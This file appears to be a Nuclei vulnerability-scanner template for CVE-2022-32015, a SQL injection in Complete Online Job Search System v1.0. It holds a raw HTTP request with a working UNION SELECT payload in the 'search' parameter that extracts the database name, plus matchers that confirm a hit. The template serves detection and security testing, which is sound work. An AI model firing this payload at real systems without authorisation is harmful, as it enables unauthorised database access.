nuclei-templates/cves/2022/CVE-2022-32015.yaml

36 lines
965 B
YAML
Raw Normal View History

2022-07-16 20:27:26 +00:00
id: CVE-2022-32015
info:
name: Complete Online Job Search System v1.0 - SQL Injection
author: arafatansari
severity: medium
description: |
Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-32015
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md
tags: cve,cve2022,sqli
requests:
- raw:
- |
GET /index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,database(),15,16,17,18,19--+ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'erisdb'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200